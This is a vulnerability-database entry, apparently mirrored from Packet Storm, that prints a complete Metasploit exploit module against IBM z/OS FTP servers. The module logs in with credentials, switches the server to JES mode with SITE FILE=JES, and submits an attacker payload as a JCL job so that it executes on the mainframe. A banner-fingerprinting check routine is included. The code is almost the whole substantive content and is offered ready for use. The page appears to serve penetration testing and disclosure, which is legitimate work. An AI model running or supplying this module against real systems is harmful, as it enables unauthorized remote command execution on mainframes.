Lucene search
K

FTP JCL Execution

🗓️ 13 May 2016 00:00:00Reported by Soldier of FortranType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

FTP JCL Execution via z/OS FTP server with SITE FILE=JES comman

Code
`require 'msf/core'  
require 'msf/core/exploit/tcp'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Ftp  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => 'FTP JCL Execution',  
'Description' => %q{(Submit JCL to z/OS via FTP and SITE FILE=JES.  
This exploit requires valid credentials on the target system)},  
'Author' =>  
[  
'Bigendian Smalls',  
'mainframed a.k.a. soldier of fortran',  
'S&Oxballs a.k.a. chiefascot'  
],  
'Arch' => ARCH_CMD,  
'License' => MSF_LICENSE,  
'Platform' => ['mainframe'],  
'Privileged' => false,  
'Targets' => [['Automatic', {}]],  
'DisclosureDate' => 'May 12 2013',  
'DisableNops' => 'true',  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
Opt::RPORT(21),  
OptInt.new('SLEEP', [ false, "Time to wait before checking if job has completed.", 5 ])  
], self.class  
)  
end  
  
def check  
##  
# Connect to get the FTP banner and check target OS  
##  
if !connect_login  
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server")  
else  
print_good("Successfully connected to FTP server.")  
end  
test_jes = send_cmd(['site', 'file=jes'])  
  
# Disconnect and check cached self.banner  
disconnect  
  
##  
# Check if the target system has an FTP server running on z/OS"  
##  
case banner  
when /IBM FTP CS V.R./  
case test_jes  
when /200 SITE/  
print_status("Found IBM z/OS Banner and JES commands accepted")  
return Exploit::CheckCode::Vulnerable  
else  
print_status("Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!")  
return Exploit::CheckCode::Detected  
end  
  
##  
# Return the Safe flag if system is not exploitable  
##  
else  
print_status("We could not recognize the server banner: #{banner.strip}")  
return Exploit::CheckCode::Safe  
end  
end  
  
##  
# Exploit the target system by submitting a JCL job via FTP  
##  
def exploit  
if !connect_login  
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server")  
else  
print_good("Successfully connected to FTP server.")  
end  
  
send_cmd(['site', 'file=jes'])  
print_status("Successfully switched to JES mode")  
  
jcl_file_name = "#{Rex::Text.rand_text_alpha(8).upcase}"  
print_status("Uploading JCL file: #{jcl_file_name}")  
  
res = send_cmd_data(['put', jcl_file_name], payload.encoded)  
if res.nil?  
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to upload JCL to FTP server")  
end  
  
job_num = res.lines.first.split.last  
print_good("Job Submitted. Job number is #{job_num}")  
  
handler  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 May 2016 00:00Current
7.4High risk
Vulners AI Score7.4
22